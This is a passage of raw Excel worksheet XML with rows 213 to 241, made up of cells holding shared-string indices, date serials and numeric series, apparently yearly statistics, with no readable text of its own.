      </c>
      <c r="T213">
        <v>597</v>
      </c>
      <c r="U213">
        <v>1285</v>
      </c>
      <c r="V213">
        <v>2107</v>
      </c>
      <c r="W213" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="214" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A214" t="s">
        <v>4</v>
      </c>
      <c r="B214">
        <v>44616.803946759261</v>
      </c>
      <c r="C214" t="s">
        <v>2349</v>
      </c>
      <c r="D214">
        <v>100</v>
      </c>
      <c r="E214" t="s">
        <v>2350</v>
      </c>
      <c r="F214">
        <v>100</v>
      </c>
      <c r="G214" t="s">
        <v>2351</v>
      </c>
      <c r="H214" t="s">
        <v>2352</v>
      </c>
      <c r="I214" t="s">
        <v>179</v>
      </c>
      <c r="J214" t="s">
        <v>180</v>
      </c>
      <c r="K214" t="s">
        <v>575</v>
      </c>
      <c r="L214" t="s">
        <v>77</v>
      </c>
      <c r="M214" t="s">
        <v>1066</v>
      </c>
      <c r="O214" t="s">
        <v>2353</v>
      </c>
      <c r="Q214" t="s">
        <v>3573</v>
      </c>
      <c r="R214">
        <v>2</v>
      </c>
      <c r="S214">
        <v>29</v>
      </c>
      <c r="U214">
        <v>23</v>
      </c>
      <c r="W214" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="215" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A215" t="s">
        <v>4</v>
      </c>
      <c r="B215">
        <v>44223.845142511571</v>
      </c>
      <c r="C215" t="s">
        <v>2355</v>
      </c>
      <c r="D215">
        <v>223</v>
      </c>
      <c r="E215" t="s">
        <v>2356</v>
      </c>
      <c r="F215">
        <v>102</v>
      </c>
      <c r="G215" t="s">
        <v>2357</v>
      </c>
      <c r="H215" t="s">
        <v>2358</v>
      </c>
      <c r="I215" t="s">
        <v>179</v>
      </c>
      <c r="J215" t="s">
        <v>180</v>
      </c>
      <c r="K215" t="s">
        <v>575</v>
      </c>
      <c r="L215" t="s">
        <v>77</v>
      </c>
      <c r="M215" t="s">
        <v>1066</v>
      </c>
      <c r="O215" t="s">
        <v>2359</v>
      </c>
      <c r="Q215" t="s">
        <v>3574</v>
      </c>
      <c r="W215" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="216" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A216" t="s">
        <v>4</v>
      </c>
      <c r="B216">
        <v>44322.944375798608</v>
      </c>
      <c r="C216" t="s">
        <v>2355</v>
      </c>
      <c r="D216">
        <v>223</v>
      </c>
      <c r="E216" t="s">
        <v>2361</v>
      </c>
      <c r="F216">
        <v>222</v>
      </c>
      <c r="G216" t="s">
        <v>2362</v>
      </c>
      <c r="H216" t="s">
        <v>2363</v>
      </c>
      <c r="I216" t="s">
        <v>179</v>
      </c>
      <c r="J216" t="s">
        <v>180</v>
      </c>
      <c r="K216" t="s">
        <v>575</v>
      </c>
      <c r="L216" t="s">
        <v>77</v>
      </c>
      <c r="M216" t="s">
        <v>1066</v>
      </c>
      <c r="O216" t="s">
        <v>2364</v>
      </c>
      <c r="P216" t="s">
        <v>920</v>
      </c>
      <c r="Q216" t="s">
        <v>3574</v>
      </c>
      <c r="R216">
        <v>1695225</v>
      </c>
      <c r="S216">
        <v>1455563</v>
      </c>
      <c r="T216">
        <v>1467864</v>
      </c>
      <c r="U216">
        <v>1312363</v>
      </c>
      <c r="V216">
        <v>1617573</v>
      </c>
      <c r="W216" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="217" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A217" t="s">
        <v>4</v>
      </c>
      <c r="B217">
        <v>43977.482397523148</v>
      </c>
      <c r="C217" t="s">
        <v>2355</v>
      </c>
      <c r="D217">
        <v>223</v>
      </c>
      <c r="E217" t="s">
        <v>2365</v>
      </c>
      <c r="F217">
        <v>100</v>
      </c>
      <c r="G217" t="s">
        <v>2366</v>
      </c>
      <c r="H217" t="s">
        <v>1071</v>
      </c>
      <c r="I217" t="s">
        <v>179</v>
      </c>
      <c r="J217" t="s">
        <v>180</v>
      </c>
      <c r="K217" t="s">
        <v>575</v>
      </c>
      <c r="L217" t="s">
        <v>77</v>
      </c>
      <c r="M217" t="s">
        <v>1066</v>
      </c>
      <c r="O217" t="s">
        <v>2367</v>
      </c>
      <c r="Q217" t="s">
        <v>3574</v>
      </c>
      <c r="W217" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="218" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A218" t="s">
        <v>4</v>
      </c>
      <c r="B218">
        <v>44223.845142442129</v>
      </c>
      <c r="C218" t="s">
        <v>2355</v>
      </c>
      <c r="D218">
        <v>223</v>
      </c>
      <c r="E218" t="s">
        <v>2368</v>
      </c>
      <c r="F218">
        <v>111</v>
      </c>
      <c r="G218" t="s">
        <v>2369</v>
      </c>
      <c r="H218" t="s">
        <v>1074</v>
      </c>
      <c r="I218" t="s">
        <v>179</v>
      </c>
      <c r="J218" t="s">
        <v>180</v>
      </c>
      <c r="K218" t="s">
        <v>575</v>
      </c>
      <c r="L218" t="s">
        <v>77</v>
      </c>
      <c r="M218" t="s">
        <v>1066</v>
      </c>
      <c r="O218" t="s">
        <v>2370</v>
      </c>
      <c r="P218" t="s">
        <v>181</v>
      </c>
      <c r="Q218" t="s">
        <v>3574</v>
      </c>
      <c r="S218">
        <v>17</v>
      </c>
      <c r="T218">
        <v>1</v>
      </c>
      <c r="U218">
        <v>33</v>
      </c>
      <c r="V218">
        <v>2</v>
      </c>
      <c r="W218" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="219" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A219" t="s">
        <v>4</v>
      </c>
      <c r="B219">
        <v>44322.94437582176</v>
      </c>
      <c r="C219" t="s">
        <v>2355</v>
      </c>
      <c r="D219">
        <v>223</v>
      </c>
      <c r="E219" t="s">
        <v>2371</v>
      </c>
      <c r="F219">
        <v>112</v>
      </c>
      <c r="G219" t="s">
        <v>2372</v>
      </c>
      <c r="H219" t="s">
        <v>2373</v>
      </c>
      <c r="I219" t="s">
        <v>179</v>
      </c>
      <c r="J219" t="s">
        <v>180</v>
      </c>
      <c r="K219" t="s">
        <v>575</v>
      </c>
      <c r="L219" t="s">
        <v>77</v>
      </c>
      <c r="M219" t="s">
        <v>1066</v>
      </c>
      <c r="O219" t="s">
        <v>2374</v>
      </c>
      <c r="Q219" t="s">
        <v>3574</v>
      </c>
      <c r="W219" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="220" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A220" t="s">
        <v>4</v>
      </c>
      <c r="B220">
        <v>44433.736928321756</v>
      </c>
      <c r="C220" t="s">
        <v>1599</v>
      </c>
      <c r="D220">
        <v>111</v>
      </c>
      <c r="E220" t="s">
        <v>2375</v>
      </c>
      <c r="F220">
        <v>101</v>
      </c>
      <c r="G220" t="s">
        <v>2376</v>
      </c>
      <c r="H220" t="s">
        <v>2377</v>
      </c>
      <c r="I220" t="s">
        <v>31</v>
      </c>
      <c r="J220" t="s">
        <v>262</v>
      </c>
      <c r="K220" t="s">
        <v>31</v>
      </c>
      <c r="L220" t="s">
        <v>77</v>
      </c>
      <c r="M220" t="s">
        <v>262</v>
      </c>
      <c r="N220" t="s">
        <v>263</v>
      </c>
      <c r="Q220" t="s">
        <v>3551</v>
      </c>
      <c r="R220">
        <v>175315</v>
      </c>
      <c r="S220">
        <v>264901</v>
      </c>
      <c r="T220">
        <v>292700</v>
      </c>
      <c r="U220">
        <v>308208</v>
      </c>
      <c r="V220">
        <v>396773</v>
      </c>
      <c r="W220" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="221" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A221" t="s">
        <v>4</v>
      </c>
      <c r="B221">
        <v>44519.632626620369</v>
      </c>
      <c r="C221" t="s">
        <v>1599</v>
      </c>
      <c r="D221">
        <v>201</v>
      </c>
      <c r="E221" t="s">
        <v>2375</v>
      </c>
      <c r="F221">
        <v>200</v>
      </c>
      <c r="G221" t="s">
        <v>2376</v>
      </c>
      <c r="H221" t="s">
        <v>2377</v>
      </c>
      <c r="I221" t="s">
        <v>31</v>
      </c>
      <c r="J221" t="s">
        <v>262</v>
      </c>
      <c r="K221" t="s">
        <v>31</v>
      </c>
      <c r="L221" t="s">
        <v>77</v>
      </c>
      <c r="M221" t="s">
        <v>262</v>
      </c>
      <c r="N221" t="s">
        <v>263</v>
      </c>
      <c r="Q221" t="s">
        <v>3552</v>
      </c>
      <c r="R221">
        <v>175315</v>
      </c>
      <c r="S221">
        <v>264901</v>
      </c>
      <c r="T221">
        <v>292700</v>
      </c>
      <c r="U221">
        <v>308208</v>
      </c>
      <c r="V221">
        <v>396773</v>
      </c>
      <c r="W221" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="222" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A222" t="s">
        <v>4</v>
      </c>
      <c r="B222">
        <v>44670.815063148148</v>
      </c>
      <c r="C222" t="s">
        <v>2378</v>
      </c>
      <c r="D222">
        <v>101</v>
      </c>
      <c r="E222" t="s">
        <v>2379</v>
      </c>
      <c r="F222">
        <v>101</v>
      </c>
      <c r="G222" t="s">
        <v>2380</v>
      </c>
      <c r="H222" t="s">
        <v>2381</v>
      </c>
      <c r="I222" t="s">
        <v>31</v>
      </c>
      <c r="J222" t="s">
        <v>262</v>
      </c>
      <c r="K222" t="s">
        <v>31</v>
      </c>
      <c r="L222" t="s">
        <v>77</v>
      </c>
      <c r="M222" t="s">
        <v>262</v>
      </c>
      <c r="N222" t="s">
        <v>263</v>
      </c>
      <c r="Q222" t="s">
        <v>3575</v>
      </c>
      <c r="R222">
        <v>40741</v>
      </c>
      <c r="S222">
        <v>30502</v>
      </c>
      <c r="T222">
        <v>34254</v>
      </c>
      <c r="U222">
        <v>68134</v>
      </c>
      <c r="V222">
        <v>112684</v>
      </c>
      <c r="W222" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="223" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A223" t="s">
        <v>4</v>
      </c>
      <c r="B223">
        <v>44223.845142488426</v>
      </c>
      <c r="C223" t="s">
        <v>2355</v>
      </c>
      <c r="D223">
        <v>223</v>
      </c>
      <c r="E223" t="s">
        <v>2383</v>
      </c>
      <c r="F223">
        <v>105</v>
      </c>
      <c r="G223" t="s">
        <v>2384</v>
      </c>
      <c r="H223" t="s">
        <v>2385</v>
      </c>
      <c r="I223" t="s">
        <v>179</v>
      </c>
      <c r="J223" t="s">
        <v>180</v>
      </c>
      <c r="K223" t="s">
        <v>575</v>
      </c>
      <c r="L223" t="s">
        <v>77</v>
      </c>
      <c r="M223" t="s">
        <v>1066</v>
      </c>
      <c r="O223" t="s">
        <v>2370</v>
      </c>
      <c r="P223" t="s">
        <v>181</v>
      </c>
      <c r="Q223" t="s">
        <v>3574</v>
      </c>
      <c r="R223">
        <v>919</v>
      </c>
      <c r="S223">
        <v>286</v>
      </c>
      <c r="T223">
        <v>793</v>
      </c>
      <c r="U223">
        <v>9721</v>
      </c>
      <c r="V223">
        <v>48911</v>
      </c>
      <c r="W223" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="224" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A224" t="s">
        <v>4</v>
      </c>
      <c r="B224">
        <v>44033.617680532407</v>
      </c>
      <c r="C224" t="s">
        <v>1489</v>
      </c>
      <c r="D224">
        <v>110</v>
      </c>
      <c r="E224" t="s">
        <v>2386</v>
      </c>
      <c r="F224">
        <v>100</v>
      </c>
      <c r="G224" t="s">
        <v>2387</v>
      </c>
      <c r="H224" t="s">
        <v>2388</v>
      </c>
      <c r="I224" t="s">
        <v>31</v>
      </c>
      <c r="J224" t="s">
        <v>262</v>
      </c>
      <c r="K224" t="s">
        <v>31</v>
      </c>
      <c r="L224" t="s">
        <v>77</v>
      </c>
      <c r="M224" t="s">
        <v>262</v>
      </c>
      <c r="N224" t="s">
        <v>263</v>
      </c>
      <c r="Q224" t="s">
        <v>1493</v>
      </c>
      <c r="W224" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="225" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A225" t="s">
        <v>4</v>
      </c>
      <c r="B225">
        <v>44292.098849618058</v>
      </c>
      <c r="C225" t="s">
        <v>1733</v>
      </c>
      <c r="D225">
        <v>105</v>
      </c>
      <c r="E225" t="s">
        <v>2392</v>
      </c>
      <c r="F225">
        <v>105</v>
      </c>
      <c r="G225" t="s">
        <v>2393</v>
      </c>
      <c r="H225" t="s">
        <v>2395</v>
      </c>
      <c r="I225" t="s">
        <v>31</v>
      </c>
      <c r="J225" t="s">
        <v>262</v>
      </c>
      <c r="K225" t="s">
        <v>31</v>
      </c>
      <c r="L225" t="s">
        <v>77</v>
      </c>
      <c r="M225" t="s">
        <v>262</v>
      </c>
      <c r="N225" t="s">
        <v>263</v>
      </c>
      <c r="Q225" t="s">
        <v>3562</v>
      </c>
      <c r="R225">
        <v>2561</v>
      </c>
      <c r="S225">
        <v>2807</v>
      </c>
      <c r="T225">
        <v>2490</v>
      </c>
      <c r="U225">
        <v>2504</v>
      </c>
      <c r="V225">
        <v>2944</v>
      </c>
      <c r="W225" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="226" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A226" t="s">
        <v>4</v>
      </c>
      <c r="B226">
        <v>44266.705436481483</v>
      </c>
      <c r="C226" t="s">
        <v>2396</v>
      </c>
      <c r="D226">
        <v>133</v>
      </c>
      <c r="E226" t="s">
        <v>2397</v>
      </c>
      <c r="F226">
        <v>113</v>
      </c>
      <c r="G226" t="s">
        <v>2398</v>
      </c>
      <c r="H226" t="s">
        <v>2399</v>
      </c>
      <c r="I226" t="s">
        <v>17</v>
      </c>
      <c r="J226" t="s">
        <v>1412</v>
      </c>
      <c r="K226" t="s">
        <v>17</v>
      </c>
      <c r="L226" t="s">
        <v>83</v>
      </c>
      <c r="M226" t="s">
        <v>72</v>
      </c>
      <c r="Q226" t="s">
        <v>3576</v>
      </c>
      <c r="R226">
        <v>390710</v>
      </c>
      <c r="S226">
        <v>399448</v>
      </c>
      <c r="T226">
        <v>330422</v>
      </c>
      <c r="U226">
        <v>413011</v>
      </c>
      <c r="V226">
        <v>370392</v>
      </c>
      <c r="W226" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="227" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A227" t="s">
        <v>4</v>
      </c>
      <c r="B227">
        <v>44266.705436516204</v>
      </c>
      <c r="C227" t="s">
        <v>2396</v>
      </c>
      <c r="D227">
        <v>133</v>
      </c>
      <c r="E227" t="s">
        <v>2401</v>
      </c>
      <c r="F227">
        <v>110</v>
      </c>
      <c r="G227" t="s">
        <v>2402</v>
      </c>
      <c r="H227" t="s">
        <v>2403</v>
      </c>
      <c r="I227" t="s">
        <v>17</v>
      </c>
      <c r="J227" t="s">
        <v>1412</v>
      </c>
      <c r="K227" t="s">
        <v>17</v>
      </c>
      <c r="L227" t="s">
        <v>83</v>
      </c>
      <c r="M227" t="s">
        <v>72</v>
      </c>
      <c r="O227" t="s">
        <v>111</v>
      </c>
      <c r="Q227" t="s">
        <v>3576</v>
      </c>
      <c r="R227">
        <v>164</v>
      </c>
      <c r="S227">
        <v>215</v>
      </c>
      <c r="T227">
        <v>120</v>
      </c>
      <c r="U227">
        <v>172</v>
      </c>
      <c r="V227">
        <v>195</v>
      </c>
      <c r="W227" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="228" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A228" t="s">
        <v>4</v>
      </c>
      <c r="B228">
        <v>44266.705436493059</v>
      </c>
      <c r="C228" t="s">
        <v>2396</v>
      </c>
      <c r="D228">
        <v>133</v>
      </c>
      <c r="E228" t="s">
        <v>2404</v>
      </c>
      <c r="F228">
        <v>110</v>
      </c>
      <c r="G228" t="s">
        <v>2405</v>
      </c>
      <c r="H228" t="s">
        <v>2406</v>
      </c>
      <c r="I228" t="s">
        <v>17</v>
      </c>
      <c r="J228" t="s">
        <v>1412</v>
      </c>
      <c r="K228" t="s">
        <v>17</v>
      </c>
      <c r="L228" t="s">
        <v>83</v>
      </c>
      <c r="M228" t="s">
        <v>72</v>
      </c>
      <c r="O228" t="s">
        <v>111</v>
      </c>
      <c r="Q228" t="s">
        <v>3576</v>
      </c>
      <c r="R228">
        <v>652</v>
      </c>
      <c r="S228">
        <v>861</v>
      </c>
      <c r="T228">
        <v>480</v>
      </c>
      <c r="U228">
        <v>676</v>
      </c>
      <c r="V228">
        <v>765</v>
      </c>
      <c r="W228" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="229" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A229" t="s">
        <v>4</v>
      </c>
      <c r="B229">
        <v>44055.660416840277</v>
      </c>
      <c r="C229" t="s">
        <v>2407</v>
      </c>
      <c r="D229">
        <v>100</v>
      </c>
      <c r="E229" t="s">
        <v>2408</v>
      </c>
      <c r="F229">
        <v>100</v>
      </c>
      <c r="G229" t="s">
        <v>2409</v>
      </c>
      <c r="H229" t="s">
        <v>2410</v>
      </c>
      <c r="I229" t="s">
        <v>31</v>
      </c>
      <c r="J229" t="s">
        <v>262</v>
      </c>
      <c r="K229" t="s">
        <v>31</v>
      </c>
      <c r="L229" t="s">
        <v>77</v>
      </c>
      <c r="M229" t="s">
        <v>262</v>
      </c>
      <c r="N229" t="s">
        <v>263</v>
      </c>
      <c r="O229" t="s">
        <v>111</v>
      </c>
      <c r="Q229" t="s">
        <v>3577</v>
      </c>
      <c r="R229">
        <v>1833275</v>
      </c>
      <c r="S229">
        <v>1434873</v>
      </c>
      <c r="T229">
        <v>1173941</v>
      </c>
      <c r="U229">
        <v>1477751</v>
      </c>
      <c r="V229">
        <v>2297368</v>
      </c>
      <c r="W229" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="230" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A230" t="s">
        <v>4</v>
      </c>
      <c r="B230">
        <v>44707.725042025464</v>
      </c>
      <c r="C230" t="s">
        <v>2412</v>
      </c>
      <c r="D230">
        <v>100</v>
      </c>
      <c r="E230" t="s">
        <v>2413</v>
      </c>
      <c r="F230">
        <v>100</v>
      </c>
      <c r="G230" t="s">
        <v>2414</v>
      </c>
      <c r="H230" t="s">
        <v>2415</v>
      </c>
      <c r="Q230" t="s">
        <v>3507</v>
      </c>
      <c r="T230">
        <v>2</v>
      </c>
      <c r="U230">
        <v>1</v>
      </c>
      <c r="W230" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="231" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A231" t="s">
        <v>4</v>
      </c>
      <c r="B231">
        <v>44503.926326932873</v>
      </c>
      <c r="C231" t="s">
        <v>2425</v>
      </c>
      <c r="D231">
        <v>212</v>
      </c>
      <c r="E231" t="s">
        <v>2426</v>
      </c>
      <c r="F231">
        <v>302</v>
      </c>
      <c r="G231" t="s">
        <v>2427</v>
      </c>
      <c r="H231" t="s">
        <v>2428</v>
      </c>
      <c r="I231" t="s">
        <v>179</v>
      </c>
      <c r="J231" t="s">
        <v>1006</v>
      </c>
      <c r="K231" t="s">
        <v>23</v>
      </c>
      <c r="L231" t="s">
        <v>77</v>
      </c>
      <c r="M231" t="s">
        <v>1006</v>
      </c>
      <c r="N231" t="s">
        <v>1007</v>
      </c>
      <c r="O231" t="s">
        <v>2429</v>
      </c>
      <c r="Q231" t="s">
        <v>3578</v>
      </c>
      <c r="R231">
        <v>9816</v>
      </c>
      <c r="S231">
        <v>7608</v>
      </c>
      <c r="T231">
        <v>7674</v>
      </c>
      <c r="U231">
        <v>7380</v>
      </c>
      <c r="V231">
        <v>8297</v>
      </c>
      <c r="W231" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="232" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A232" t="s">
        <v>4</v>
      </c>
      <c r="B232">
        <v>44603.965466319445</v>
      </c>
      <c r="C232" t="s">
        <v>2431</v>
      </c>
      <c r="D232">
        <v>110</v>
      </c>
      <c r="E232" t="s">
        <v>2432</v>
      </c>
      <c r="F232">
        <v>110</v>
      </c>
      <c r="G232" t="s">
        <v>2433</v>
      </c>
      <c r="H232" t="s">
        <v>2434</v>
      </c>
      <c r="I232" t="s">
        <v>268</v>
      </c>
      <c r="J232" t="s">
        <v>566</v>
      </c>
      <c r="K232" t="s">
        <v>12</v>
      </c>
      <c r="L232" t="s">
        <v>77</v>
      </c>
      <c r="M232" t="s">
        <v>622</v>
      </c>
      <c r="N232" t="s">
        <v>623</v>
      </c>
      <c r="Q232" t="s">
        <v>3579</v>
      </c>
      <c r="R232">
        <v>1688</v>
      </c>
      <c r="S232">
        <v>3427</v>
      </c>
      <c r="T232">
        <v>7298</v>
      </c>
      <c r="U232">
        <v>12173</v>
      </c>
      <c r="V232">
        <v>16341</v>
      </c>
      <c r="W232" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="233" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A233" t="s">
        <v>4</v>
      </c>
      <c r="B233">
        <v>44662.396883715279</v>
      </c>
      <c r="C233" t="s">
        <v>2436</v>
      </c>
      <c r="D233">
        <v>100</v>
      </c>
      <c r="E233" t="s">
        <v>2437</v>
      </c>
      <c r="F233">
        <v>100</v>
      </c>
      <c r="G233" t="s">
        <v>2438</v>
      </c>
      <c r="H233" t="s">
        <v>2439</v>
      </c>
      <c r="I233" t="s">
        <v>179</v>
      </c>
      <c r="J233" t="s">
        <v>1006</v>
      </c>
      <c r="K233" t="s">
        <v>23</v>
      </c>
      <c r="L233" t="s">
        <v>77</v>
      </c>
      <c r="M233" t="s">
        <v>1006</v>
      </c>
      <c r="N233" t="s">
        <v>1007</v>
      </c>
      <c r="Q233" t="s">
        <v>161</v>
      </c>
      <c r="W233" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="234" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A234" t="s">
        <v>4</v>
      </c>
      <c r="B234">
        <v>44047.731314027777</v>
      </c>
      <c r="C234" t="s">
        <v>2580</v>
      </c>
      <c r="D234">
        <v>100</v>
      </c>
      <c r="E234" t="s">
        <v>2581</v>
      </c>
      <c r="F234">
        <v>100</v>
      </c>
      <c r="G234" t="s">
        <v>2582</v>
      </c>
      <c r="H234" t="s">
        <v>2583</v>
      </c>
      <c r="I234" t="s">
        <v>185</v>
      </c>
      <c r="J234" t="s">
        <v>186</v>
      </c>
      <c r="K234" t="s">
        <v>16</v>
      </c>
      <c r="L234" t="s">
        <v>83</v>
      </c>
      <c r="M234" t="s">
        <v>72</v>
      </c>
      <c r="O234" t="s">
        <v>2584</v>
      </c>
      <c r="Q234" t="s">
        <v>3580</v>
      </c>
      <c r="R234">
        <v>488622</v>
      </c>
      <c r="S234">
        <v>553729</v>
      </c>
      <c r="T234">
        <v>488258</v>
      </c>
      <c r="U234">
        <v>532334</v>
      </c>
      <c r="V234">
        <v>594858</v>
      </c>
      <c r="W234" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="235" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A235" t="s">
        <v>4</v>
      </c>
      <c r="B235">
        <v>44047.731314027777</v>
      </c>
      <c r="C235" t="s">
        <v>2580</v>
      </c>
      <c r="D235">
        <v>300</v>
      </c>
      <c r="E235" t="s">
        <v>2581</v>
      </c>
      <c r="F235">
        <v>100</v>
      </c>
      <c r="G235" t="s">
        <v>2586</v>
      </c>
      <c r="H235" t="s">
        <v>2583</v>
      </c>
      <c r="I235" t="s">
        <v>185</v>
      </c>
      <c r="J235" t="s">
        <v>186</v>
      </c>
      <c r="K235" t="s">
        <v>16</v>
      </c>
      <c r="L235" t="s">
        <v>83</v>
      </c>
      <c r="M235" t="s">
        <v>72</v>
      </c>
      <c r="O235" t="s">
        <v>2584</v>
      </c>
      <c r="Q235" t="s">
        <v>161</v>
      </c>
      <c r="W235" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="236" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A236" t="s">
        <v>4</v>
      </c>
      <c r="B236">
        <v>44047.731314004632</v>
      </c>
      <c r="C236" t="s">
        <v>2580</v>
      </c>
      <c r="D236">
        <v>100</v>
      </c>
      <c r="E236" t="s">
        <v>2587</v>
      </c>
      <c r="F236">
        <v>100</v>
      </c>
      <c r="G236" t="s">
        <v>2588</v>
      </c>
      <c r="H236" t="s">
        <v>2589</v>
      </c>
      <c r="I236" t="s">
        <v>185</v>
      </c>
      <c r="J236" t="s">
        <v>186</v>
      </c>
      <c r="K236" t="s">
        <v>16</v>
      </c>
      <c r="L236" t="s">
        <v>83</v>
      </c>
      <c r="M236" t="s">
        <v>72</v>
      </c>
      <c r="O236" t="s">
        <v>2590</v>
      </c>
      <c r="Q236" t="s">
        <v>3580</v>
      </c>
      <c r="R236">
        <v>864184</v>
      </c>
      <c r="S236">
        <v>810462</v>
      </c>
      <c r="T236">
        <v>758411</v>
      </c>
      <c r="U236">
        <v>719610</v>
      </c>
      <c r="V236">
        <v>800650</v>
      </c>
      <c r="W236" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="237" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A237" t="s">
        <v>4</v>
      </c>
      <c r="B237">
        <v>44047.731314004632</v>
      </c>
      <c r="C237" t="s">
        <v>2580</v>
      </c>
      <c r="D237">
        <v>300</v>
      </c>
      <c r="E237" t="s">
        <v>2587</v>
      </c>
      <c r="F237">
        <v>100</v>
      </c>
      <c r="H237" t="s">
        <v>2589</v>
      </c>
      <c r="I237" t="s">
        <v>185</v>
      </c>
      <c r="J237" t="s">
        <v>186</v>
      </c>
      <c r="K237" t="s">
        <v>16</v>
      </c>
      <c r="L237" t="s">
        <v>83</v>
      </c>
      <c r="M237" t="s">
        <v>72</v>
      </c>
      <c r="O237" t="s">
        <v>2590</v>
      </c>
      <c r="Q237" t="s">
        <v>161</v>
      </c>
      <c r="W237" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="238" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A238" t="s">
        <v>4</v>
      </c>
      <c r="B238">
        <v>44047.731314039353</v>
      </c>
      <c r="C238" t="s">
        <v>2580</v>
      </c>
      <c r="D238">
        <v>100</v>
      </c>
      <c r="E238" t="s">
        <v>2591</v>
      </c>
      <c r="F238">
        <v>100</v>
      </c>
      <c r="H238" t="s">
        <v>2592</v>
      </c>
      <c r="I238" t="s">
        <v>185</v>
      </c>
      <c r="J238" t="s">
        <v>186</v>
      </c>
      <c r="K238" t="s">
        <v>16</v>
      </c>
      <c r="L238" t="s">
        <v>83</v>
      </c>
      <c r="M238" t="s">
        <v>72</v>
      </c>
      <c r="O238" t="s">
        <v>2593</v>
      </c>
      <c r="Q238" t="s">
        <v>3580</v>
      </c>
      <c r="W238" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="239" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A239" t="s">
        <v>4</v>
      </c>
      <c r="B239">
        <v>44047.731314039353</v>
      </c>
      <c r="C239" t="s">
        <v>2580</v>
      </c>
      <c r="D239">
        <v>300</v>
      </c>
      <c r="E239" t="s">
        <v>2591</v>
      </c>
      <c r="F239">
        <v>100</v>
      </c>
      <c r="H239" t="s">
        <v>2592</v>
      </c>
      <c r="I239" t="s">
        <v>185</v>
      </c>
      <c r="J239" t="s">
        <v>186</v>
      </c>
      <c r="K239" t="s">
        <v>16</v>
      </c>
      <c r="L239" t="s">
        <v>83</v>
      </c>
      <c r="M239" t="s">
        <v>72</v>
      </c>
      <c r="O239" t="s">
        <v>2593</v>
      </c>
      <c r="Q239" t="s">
        <v>161</v>
      </c>
      <c r="W239" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="240" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A240" t="s">
        <v>4</v>
      </c>
      <c r="B240">
        <v>44047.489031041667</v>
      </c>
      <c r="C240" t="s">
        <v>2609</v>
      </c>
      <c r="D240">
        <v>100</v>
      </c>
      <c r="E240" t="s">
        <v>2610</v>
      </c>
      <c r="F240">
        <v>100</v>
      </c>
      <c r="G240" t="s">
        <v>2611</v>
      </c>
      <c r="H240" t="s">
        <v>2612</v>
      </c>
      <c r="I240" t="s">
        <v>179</v>
      </c>
      <c r="J240" t="s">
        <v>180</v>
      </c>
      <c r="K240" t="s">
        <v>575</v>
      </c>
      <c r="L240" t="s">
        <v>77</v>
      </c>
      <c r="M240" t="s">
        <v>1066</v>
      </c>
      <c r="O240" t="s">
        <v>2613</v>
      </c>
      <c r="Q240" t="s">
        <v>1406</v>
      </c>
      <c r="W240" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="241" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A241" t="s">
        <v>4</v>
      </c>
      <c r="B241">
        <v>44524.833629583336</v>
      </c>
      <c r="C241" t="s">
        <v>2619</v>
      </c>
      <c r="D241">
        <v>105</v>
      </c>
      <c r="E241" t="s">
        <v>2620</v>
      </c>
      <c r="F241">
        <v>115</v>
      </c>
      <c r="G241" t="s">
        <v>2621</v>
      </c>
      <c r="H241" t="s">
        <v>2622</v>
      </c>
      <c r="I241" t="s">
        <v>17</v>
      </c>
      <c r="J241" t="s">
        <v>1412</v>
      </c>
      <c r="K241" t="s">
        <v>17</v>
      </c>
      <c r="L241" t="s">
        <v>83</v>
      </c>
      <c r="M241" t="s">
        <v>72</v>
      </c>
      <c r="Q241" t="s">
        <v>3581</v>
      </c>
      <c r="R241">
        <v>566667</v>
      </c>
      <c r="S241">
        <v>392688</v>
      </c>
      <c r="T241">
        <v>615224</v>
      </c>
      <c r="U241">
        <v>536617</v>
      </c>
